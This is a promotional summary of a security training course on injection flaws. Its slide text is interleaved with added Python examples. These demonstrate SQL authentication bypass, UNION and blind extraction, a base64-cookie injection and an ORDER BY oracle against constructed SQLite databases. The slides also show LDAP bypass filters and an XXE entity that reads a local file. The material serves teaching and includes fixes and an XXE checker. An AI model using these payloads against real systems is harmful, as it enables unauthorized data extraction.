This document provides information about a 2-day training course on exploiting injection flaws. It discusses the agenda, which includes hands-on exercises covering SQL injection, LDAP injection, ORM injection, XPath injection and combining XXE with XPath. The trainer, Sumit Siddharth, is an expert in application and database security with over 8 years' experience who has spoken at several security conferences. The course aims to help attendees think outside the box and find issues that automated tools miss, through practical CTF exercises.
Injection flaw teaser
1. The Art Of Exploiting
Injection Flaws
Sumit Siddharth
sid@notsosecure.com
2. About the course
Hands on 2 days training
Requires out-of-the-box thinking (strong coffee recommended!)
20 exercises, 100 slides, 8 CTFs!
Previous feedback:
"This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid"
"I have been pentesting for 4 years now, and thought I knew all about SQLi. I guess I was wrong. If anyone knows this subject well, it is Sid"
3. About Me
Sumit “sid” Siddharth
Speaker/Trainer at Black Hat, Def con,
OWASP Appsec, HITB, Ruxcon etc
My blog: www.notsosecure.com
Specialist in Application & Database Security!
More than 8 years of Pentesting!
Co-author: SQL Injection, attacks and defense
Head of Penetration testing@7Safe
5. Exploiting SQL Injections
Authentication Bypass
Extracting Data
Error Message Enabled
Error Message Disabled
Union Injection
Blind Injection
Time Delays
Out Of Band Channels
Privilege Escalation
OS code execution
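The techniques in this list, worked through against an in-memory SQLite database. This is an added example and not code from the course: the users table, the secrets table and the flag value are constructed, and SQLite stands in for whatever engine the target runs. It shows the authentication bypass, a UNION extraction and a boolean-blind extraction against one string-built login query, next to the parameterised version that none of the payloads touch.

```python
import sqlite3

# Added example, not code from the course. An in-memory SQLite database stands in
# for the target; the users table, the secrets table and the flag are constructed.
SECRET = "flag{s3cr3t}"

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'correct horse battery staple');
        CREATE TABLE secrets (data TEXT);
    """)
    db.execute("INSERT INTO secrets VALUES (?)", (SECRET,))
    return db

DB = make_db()

def login_vulnerable(username, password):
    """String-built query: the login form from the authentication-bypass slide."""
    sql = ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return DB.execute(sql).fetchone()

def login_fixed(username, password):
    """Bound parameters: input is data, never SQL, so none of the payloads below work."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return DB.execute(sql, (username, password)).fetchone()

def auth_bypass():
    # Close the string and comment out the password check:
    #   ... WHERE username = 'admin'--' AND password = 'x'
    return login_vulnerable("admin'--", "x")

def union_extract():
    # The UNION must match the column count (2) of the original SELECT
    return login_vulnerable("' UNION SELECT 1, data FROM secrets--", "x")

def blind_oracle(condition):
    """True if the injected condition makes the query return the admin row."""
    return login_vulnerable("admin' AND (%s)--" % condition, "x") is not None

def blind_extract(max_len=32):
    """Boolean-blind extraction: one query per candidate character and position."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789{}_-"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if blind_oracle("(SELECT substr(data,%d,1) FROM secrets) = '%s'" % (pos, ch)):
                out += ch
                break
        else:
            break   # no candidate matched: past the end of the string
    return out
```

SQLite has no sleep function, so the time-delay variant is not shown; on MySQL the oracle would wrap the condition in IF(..., SLEEP(n), 0) and measure the round trip instead of looking at the response body.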
6. Exercise 9.8 – SQL Injection: OS command execution
http://hacklab.net/hackme_7.5/
Objective
Exploit SQL injection to run OS commands on the database
server
CTF: What are the contents of C:\secret.txt on the server?
Time
10 mins
7. Advanced SQL Injection
Insanely Blind SQL Injection
Application returns same response
Injection point in INSERT/UPDATE statement
8. Encoding/Decoding User Input
Base64 decoding user input
Hex decoding user input
Real world examples
WordPress Admin-Ajax.php unauthenticated SQL injection
PHP-Nuke auth.php
$cookie=explode(';', urldecode(empty($_POST['cookie'])))
$admin=base64_decode($admin)
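Why a decoding step hides an injection point from scanners, as an added example that is not the PHP-Nuke code. It models an application that base64-decodes a cookie holding "name:pwd_hash" before building its query; the table, the row and the cookie format are constructed. The same payload is sent twice: raw, where the decoder rejects it and nothing reaches SQL, and wrapped in the application's own encoding, where it bypasses the check.

```python
import base64
import sqlite3

# Added example, not the PHP-Nuke code. Models an application that base64-decodes
# a cookie holding "name:pwd_hash" before building its query; table and row constructed.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE admins (name TEXT, pwd_hash TEXT);
    INSERT INTO admins VALUES ('God', 'e10adc3949ba59abbe56e057f20f883e');
""")

def decode_cookie(cookie):
    """Return (name, pwd_hash) or None when the cookie is not valid base64/UTF-8."""
    try:
        decoded = base64.b64decode(cookie, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    name, _, pwd_hash = decoded.partition(":")
    return name, pwd_hash

def admin_from_cookie(cookie):
    """Vulnerable: the decoded fields are concatenated into the query."""
    fields = decode_cookie(cookie)
    if fields is None:
        return None     # to a scanner injecting into the raw cookie this looks like "no injection"
    sql = "SELECT name FROM admins WHERE name = '%s' AND pwd_hash = '%s'" % fields
    return DB.execute(sql).fetchone()

def admin_from_cookie_fixed(cookie):
    """Same flow with bound parameters; the decoded payload stays data."""
    fields = decode_cookie(cookie)
    if fields is None:
        return None
    return DB.execute("SELECT name FROM admins WHERE name = ? AND pwd_hash = ?",
                      fields).fetchone()

PAYLOAD = "God'--:anything"     # closes the string and comments out the hash check

def probe_raw():
    """Quote sent in the raw cookie: rejected by the decoder, never reaches SQL."""
    return admin_from_cookie(PAYLOAD)

def probe_encoded():
    """Same payload wrapped in the application's own encoding."""
    return admin_from_cookie(base64.b64encode(PAYLOAD.encode()).decode())
```

The practical lesson is to read the decoding chain before fuzzing: a tester who encodes payloads the way the application expects finds the flaw; a tool sending raw quotes reports the parameter as clean.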
9. SQL Injection in SQL Names
Consider the following:
Dim cat, orderBy, query
cat = Replace(Request.Form("cat"), "'", "''")
orderBy = Replace(Request.Form("orderBy"), "'", "''")
query = "SELECT * FROM prod WHERE cat = '" & cat & "' ORDER BY " & orderBy
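The quote doubling above protects cat, which sits inside quotes, but not orderBy, which is a SQL name and is concatenated bare. The following added example (not code from the slides) reproduces that snippet in Python over SQLite and extracts a secret through the ORDER BY position with a payload that contains no quote characters at all, so the Replace() has nothing to act on. The product rows and the secret are constructed.

```python
import sqlite3

# Added example, not code from the slides: the ASP snippet's quote doubling, redone
# in Python over SQLite, to show why it does not protect the ORDER BY position.
# Product rows and the secret are constructed.
SECRET = "s3cr3t"
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE prod (name TEXT, price REAL, cat TEXT);
    INSERT INTO prod VALUES ('zebra', 1.0, 'toys');
    INSERT INTO prod VALUES ('apple', 9.0, 'toys');
    CREATE TABLE secrets (data TEXT);
""")
DB.execute("INSERT INTO secrets VALUES (?)", (SECRET,))

def q(s):
    return s.replace("'", "''")          # Replace(x, "'", "''") from the slide

def search(cat, order_by):
    """cat is quoted, so doubling protects it; orderBy is a SQL name and is not quoted."""
    sql = "SELECT name FROM prod WHERE cat = '%s' ORDER BY %s" % (q(cat), q(order_by))
    return [row[0] for row in DB.execute(sql)]

ALLOWED_ORDER = {"name": "name", "price": "price"}

def search_fixed(cat, order_by):
    """Identifiers cannot be bound as parameters; map them through an allowlist instead."""
    column = ALLOWED_ORDER.get(order_by)
    if column is None:
        raise ValueError("unsupported sort column")
    sql = "SELECT name FROM prod WHERE cat = ? ORDER BY " + column
    return [row[0] for row in DB.execute(sql, (cat,))]

def extract_secret(max_len=16):
    """Sort-order oracle: condition true -> sorted by name (apple first),
    false -> sorted by price (zebra first). char() keeps the payload quote-free."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = ("(CASE WHEN (SELECT substr(data,%d,1) FROM secrets) = char(%d) "
                       "THEN name ELSE price END)" % (pos, ord(ch)))
            if search("toys", payload)[0] == "apple":
                out += ch
                break
        else:
            break   # no character matched: end of the secret
    return out
```

Bound parameters cannot carry table or column names, which is why an allowlist lookup is the fix for SQL names rather than escaping.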
10. Hacking Oracle from Web
Exploiting SQL Injection against oracle database
How to extract data
One Query to get them all!
How to execute OS code
What if we are not DBA
Become DBA
Execute OS code
Drop DBA
11. Capture The Flag: SQL Injection
http://hacklab.net/ctf.asp?data=foobar
Objective
• What's in C:\secret.txt
Time
20 Mins!
No instructions or hints this time!
12. Day 2: The Art of Exploiting
Lesser Known Injection Flaws
ORM Injection
LDAP Injection
Advanced LDAP Injection
XPath Injection
Xpath v2
XML Entity Injection
Combining Xpath and XXE
CTF
Q&A
13. Hibernate Query Language Injection
User input concatenated into the HQL query is passed on to the underlying SQL engine
List<Event> result = session.createQuery(
"from Event e where e.title='" + param +
"'").list();
14. HACKING LDAP
LDAP overview
LDAP injection
Blind LDAP injection
Hacking LDAP in practice
Securing Applications Against LDAP Injections
15. LDAP Injection: Authentication Bypass
(&(user=username)(password=pwd))
Usually the password is hashed before it is matched against the stored value,
so the injection is most likely to work only in the username field
(&(user=username)(password=*))
(&(user=username)(&))(password=pwd))
Anything after the first complete filter is ignored by OpenLDAP
20. XPath 2.0 Features
Hugely increased feature set:
Regular expressions
Unicode normalization
String to code point conversion
Remote document references
All of these can be used to speed up document retrieval and reduce the key space we have to search.
21. XPath 2.0
Allows reading not just the current XML document but any arbitrary XML file on the file system (via the doc() function).
22. Hacking Web Services with XML External Entity
Not validating XML input before processing it
An attacker can inject an external entity:
<!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
The web service parses the entity and the parser accesses the local resource
Unauthorized access to information
Port scanning
Denial of service attack
Breaking the XML syntax
Supplying files like /dev/urandom
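A pre-parse check for the document shapes listed above, as an added example that is not code from the slides. It uses expat's DOCTYPE and entity-declaration callbacks from the Python standard library to inspect the internal subset and reject external entities (the file:///c:/boot.ini and /dev/urandom cases, and the URLs used for port scanning), external DTD references, parameter entities and runaway internal-entity expansion, stopping before any content is parsed. The three sample documents are constructed; the size limit is an assumed value.

```python
import re
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Added example, not from the slides. Uses expat's declaration callbacks to inspect
# the DOCTYPE and reject dangerous shapes before the document is parsed for real.
# The three sample documents are constructed; MAX_EXPANSION is an assumed limit.
MAX_EXPANSION = 10_000          # bytes of expanded internal-entity text we tolerate

class Rejected(Exception):
    pass

def inspect_xml(data):
    """Return (True, root tag) for an accepted document or (False, reason) otherwise."""
    entities, problems = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if sysid or pubid:
            problems.append("external DTD %s" % (sysid or pubid))

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            problems.append("parameter entity %%%s;" % name)
        elif sysid or pubid:
            problems.append("external entity &%s; -> %s" % (name, sysid or pubid))
        else:
            entities[name] = value          # literal replacement text, refs unexpanded

    def end_doctype():
        memo = {}
        def size(name, stack=()):
            """Expanded size of one entity; cycles and unknown names count as 0."""
            if name in memo:
                return memo[name]
            if name in stack or name not in entities:
                return 0
            text = entities[name]
            total = len(re.sub(r"&[^;]+;", "", text)) + sum(
                size(ref, stack + (name,)) for ref in re.findall(r"&([^;]+);", text))
            memo[name] = total
            return total
        expansion = sum(size(n) for n in entities)
        if expansion > MAX_EXPANSION:
            problems.append("entity expansion of about %d bytes" % expansion)
        if problems:
            raise Rejected("; ".join(problems))   # stop before any content is parsed

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = start_doctype
    p.EntityDeclHandler = entity_decl
    p.EndDoctypeDeclHandler = end_doctype
    try:
        p.Parse(data, True)
    except Rejected as e:
        return False, str(e)
    except xml.parsers.expat.ExpatError as e:
        return False, "malformed XML: %s" % e
    return True, ET.fromstring(data).tag

# Constructed inputs
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE foo [<!ENTITY pwned SYSTEM "file:///c:/boot.ini">]>'
           b'<foo>&pwned;</foo>')
BILLION_LAUGHS = (b'<!DOCTYPE lolz [<!ENTITY lol0 "lol">'
                  + b"".join(b'<!ENTITY lol%d "%s">' % (n, (b"&lol%d;" % (n - 1)) * 10)
                             for n in range(1, 6))
                  + b']><lolz>&lol5;</lolz>')
SAFE_DOC = (b'<!DOCTYPE note [<!ENTITY who "NotSoSecure">]>'
            b'<note><to>&who;</to></note>')
```

If the application has no legitimate use for a DTD at all, the simpler rule is to reject any document containing one; libraries such as defusedxml package that policy, and this check is only worth writing when internal entities must be allowed through.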
23. Combining XXE and Xpath
Did I say that with XPath 2.0 you can read arbitrary XML files on the file system?
I actually meant:
with XPath 2.0 you can read arbitrary XML files on the file system.
Introducing Xcat